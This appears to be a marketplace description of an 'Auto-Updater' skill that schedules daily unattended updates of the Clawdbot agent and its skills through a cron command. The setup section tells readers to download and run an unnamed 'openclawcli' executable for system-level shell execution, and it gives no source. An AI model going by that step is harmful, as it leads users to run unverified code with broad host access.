What is Auto-Updater?

The Auto-Updater skill is a vital maintenance tool designed to keep your development environment synchronized with the latest features and security patches. By leveraging the Openclaw Skills ecosystem, it automates the tedious process of checking for software updates, applying them to the core agent and its extensions, and providing a comprehensive report of changes. It ensures that your automated workflows never fall behind due to outdated dependencies.

This skill is particularly useful for developers who want a 'set and forget' approach to their AI tooling. It handles the complexities of version management and environment migrations behind the scenes, allowing you to focus on coding while Openclaw Skills remain optimized and secure. Note that this skill requires the openclawcli utility to be active on your host machine to execute system-level update commands.

Auto-Updater Use Cases

  • Ensuring Clawdbot always runs the latest version with the newest bug fixes.
  • Synchronizing all installed Openclaw Skills to their most recent registry versions automatically.
  • Receiving daily summaries of environment changes without manual intervention.
  • Maintaining system stability through automated migrations via clawdbot doctor.

How Auto-Updater Works

  1. The skill registers a recurring cron job within the Clawdbot environment.
  2. At the scheduled time (default 4:00 AM), the system triggers the update sequence.
  3. It updates the core Clawdbot package via the appropriate package manager (npm, pnpm, bun) or git source.
  4. It executes a global update for all installed Openclaw Skills using the clawdhub utility.
  5. It runs a health check to apply any necessary database migrations or configuration fixes.
  6. Finally, it generates and sends a detailed summary message to the user highlighting version jumps and status.

Auto-Updater Setup

Ensure openclawcli is installed and running on your system. For Windows, download and run the executable. For macOS, install via the terminal. Once the utility is active, you can trigger the setup by asking Clawdbot:

"Set up daily auto-updates for yourself and all your skills."

Alternatively, manually add the cron job via the CLI:

clawdbot cron add \
  --name "Daily Auto-Update" \
  --cron "0 4 * * *" \
  --tz "America/Los_Angeles" \
  --session isolated \
  --wake now \
  --deliver \
--message "Run daily auto-updates: check for Clawdbot updates and update all skills. Report what was updated."

Auto-Updater Data Schema & Taxonomy

The skill manages update metadata and cron scheduling as follows:

Component Detail
Cron Schedule Standard crontab format (defaulting to 4:00 AM daily)
Update Logs Textual summary of version changes (Old vs New)
Tooling Requires openclawcli for shell execution
Scope Targets Clawdbot core and all registered Openclaw Skills

Auto-Updater Advanced Features

  • Dry-run mode support via CLI to preview updates without applying them.
  • Customizable timezone settings and execution windows via cron parameters.
  • Isolated session execution to prevent interference with active developer chats.
  • Automatic system migrations to ensure configuration compatibility after core updates.
